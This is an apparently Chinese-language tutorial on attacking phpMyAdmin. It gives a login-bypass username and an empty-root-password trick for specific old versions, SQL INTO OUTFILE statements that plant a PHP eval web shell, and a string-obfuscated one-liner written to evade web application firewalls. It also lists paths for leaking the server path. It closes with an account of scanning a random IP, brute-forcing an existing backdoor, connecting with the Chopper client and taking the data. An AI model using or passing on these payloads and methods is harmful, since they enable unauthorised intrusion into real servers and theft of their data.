下面由phpmyadmin教程欄目給大家介紹關(guān)于PHPmyadmin漏洞和拿shell,希望對需要的朋友有所幫助!
phpmyadmin的漏洞相對來說,還是比較多的,對于新手來說,分享幾個(gè)漏洞,深入的處于代碼審計(jì)方面的也可以和我討論
phpmyadmin2.11.3-2.11.4 這兩個(gè)版本存在萬能密碼,直接使用‘localhost’@'@”為賬號,密碼不用輸入。
phpmyadmin2.11.9.2 這個(gè)版本存在空口令。直接root用戶登陸,密碼不用
找這個(gè)的話 用自己的寫的腳本,或者搜素引擎什么的,這里懂的人就懂了,不懂也不在這里。
關(guān)于拿shell,—-》root權(quán)限,并且有寫文件權(quán)限 —-》導(dǎo)出的目錄有寫權(quán)限 —-》有的情況下,就算你這兩個(gè)都有,但是服務(wù)器的一些配置還是會對這個(gè)有影響。
在getshell之前先進(jìn)入一個(gè)數(shù)據(jù)庫
第一種,使用sql語句,創(chuàng)建一個(gè)表,添加一個(gè)字段,字段的內(nèi)容為一句話,然后導(dǎo)出到php文件中,最后刪除這個(gè)表,這個(gè)是最保險(xiǎn)的方法
Create TABLE 表 (列 text NOT NULL)
Insert INTO 表 (列) VALUES('<?php eval($_POST[mima])?>')
select 列 from 表 into _utfile '路徑'
Drop TABLE IF EXISTS 表;
第二種方法,這個(gè)是直接寫入
select '一句話'INTO _UTFILE '路徑'
還有幾種方法,大致原理都一樣。
然后,一般的話,一句話都是
<?php @eval($_POST[x])?>
有狗的話,用免殺一句話,下面這個(gè)是我過年前構(gòu)造的過狗一句話,現(xiàn)在應(yīng)該還可以過
<?php
$a = 's';
$str = str_repeat($a,2);
$to = $_POST;
//echo $str;
$exp = 'a'.$str[0].$str[1].'e'.'r'.'t';
$exp($to['x'])
?>
找路徑的話,
1// 利用phpinfo.php
2//利用phpmyadmin的一些文件報(bào)錯(cuò),下面都是網(wǎng)上通用的
/phpMyAdmin/index.php?lang[]=1
/phpMyAdmin/phpinfo.php
/load_file()
/phpmyadmin/themes/darkblue_orange/layout.inc.php
/phpmyadmin/libraries/select_lang.lib.php
/phpmyadmin/libraries/lect_lang.lib.php
/phpmyadmin/libraries/mcrypt.lib.php
/phpmyadmin/libraries/export/xls.php
3//再者就是利用網(wǎng)站包路徑,這些會的都會了,不會的慢慢的就會了。
下面開始實(shí)戰(zhàn),腳本掃到一個(gè)IP,顯示存在phpmyadmin,打開
一看這些php文件就是后門一句話,放到幾萬字典爆破,兩秒鐘
直接菜刀鏈接。。。。。
這個(gè)肯定被人搞了,直接打包好東西,你懂的。。。提權(quán)什么的就不必要了。